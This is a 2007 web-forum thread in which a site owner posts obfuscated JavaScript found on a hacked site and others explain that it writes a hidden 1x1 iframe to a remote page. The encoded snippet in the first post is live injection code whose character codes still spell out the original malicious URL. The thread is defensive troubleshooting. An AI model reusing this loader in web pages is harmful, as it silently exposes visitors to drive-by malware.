Site hacked and found this code

Forum Moderators: open

Message Too Old, No Replies

Site hacked and found this code

Does anyone know what it is?

bts111

1:28 pm on Apr 19, 2007 (gmt 0)

One of my sites was hacked and I found this script. Anyone have any idea what it's for?

Thanks

<SCRIPT LANGUAGE="JavaScript">

<!--

function Decode(){var temp="",i,c=0,out="";
var str="60!73!70!82!65!77!69!32!83!82!67!61!34!104
!116!116!112!58!47!47!105!118!101!99!111!110!109
!105!103!97!46!105!110!102!111!47!120!115!121
!115!49!47!105!110!100!101!120!46!112!104!112
!34!32!87!73!68!84!72!61!49!32!72!69!73!71
!72!84!61!49!32!70!82!65!77!69!66!79!82!68
!69!82!61!48!32!83!67!82!79!76!76!73!78!71
!61!78!79!62!60!47!105!102!114!97!109!101
!62!";l=str.length;while(c<=str.length-1)
{while(str.charAt(c)!='!')
temp=temp+str.charAt(c++);
c++;out=out+String.fromCharCode(temp);temp="";
}document.write(out);}

//-->

</SCRIPT><SCRIPT LANGUAGE="JavaScript">

<!--

Decode();

//-->

</SCRIPT><html>

[edited by: encyclo at 11:59 pm (utc) on April 20, 2007]
[edit reason] line breaks added to fix side-scroll [/edit]

birdbrain

2:48 pm on Apr 19, 2007 (gmt 0)

Hi there bts111,

all that I can tell you about this is that it places, via document.write(), an iframe on your page...


<iframe src="http://example.info/xsys1/index.php" width="1" height="1" scrolling="no"></iframe>

birdbrain

[edited by: jatar_k at 2:49 pm (utc) on April 19, 2007]

Dabrowski

9:02 pm on Apr 19, 2007 (gmt 0)

Here's the WHOIS for that domain:

Domain ID:D1050756-LRMS
Domain Name:EXAMPLE.INFO
Created On:08-Oct-2001 16:33:16 UTC
Last Updated On:10-Jun-2002 20:54:10 UTC
Expiration Date:08-Oct-2011 16:33:16 UTC
Trademark Name:ICANNReserved
Sponsoring Registrar:Afilias Ltd. (R145-LRMS)
Status:INACTIVE
Registrant ID:C2283145-LRMS
Registrant Name:Internet Corporation for Assigned Names and Numbers
Registrant Organization:ICANN
Registrant Street1:4676 Admiralty Way
Registrant Street2:Suite 330
Registrant Street3:
Registrant City:Marina Del Rey
Registrant State/Province:CA
Registrant Postal Code:90292-6601
Registrant Country:US
Registrant Phone:+1.2157065700
Registrant Phone Ext.:
Registrant FAX:+1.2157065701
Registrant FAX Ext.:
Registrant *************@afilias.info

As you can see, status is INACTIVE and no name servers, so that IRAME wouldn't even have been noticable on your page.

No harm done this time, I suggest you look closer at your security though!

eelixduppy

9:28 pm on Apr 19, 2007 (gmt 0)

Dabrowski, just a little side note. The hacker's site is not example.info,
but something else. The code posted by birdbrain has been exemplified not
to give out any specifics and violate the terms of service. With that being said,
the code could still have been potentially harmful. :)

Dabrowski

10:01 pm on Apr 19, 2007 (gmt 0)

D'oh!

bts111

10:57 pm on Apr 19, 2007 (gmt 0)

Thanks heaps to everyone!

bjoz3000

3:49 am on Apr 25, 2007 (gmt 0)

Hi Bts111

I had the exact same issue. did you find any info on how the js was being inserted into the page. I was told by my web host that my computer that was uploading our web pages must had an FTP based virus.

I ran checks on my pc and couldnt pick anything up in symantec or AVG virus checker so im still kind of baffled how this was happening. They were telling me the virus was definately not on the web server.

Any info much appreciated.

vincevincevince

3:56 am on Apr 25, 2007 (gmt 0)

Almost always due to insecure scripts somewhere on their server. It might not be your site, it might be another site hosted there. I'd dump the host and move today.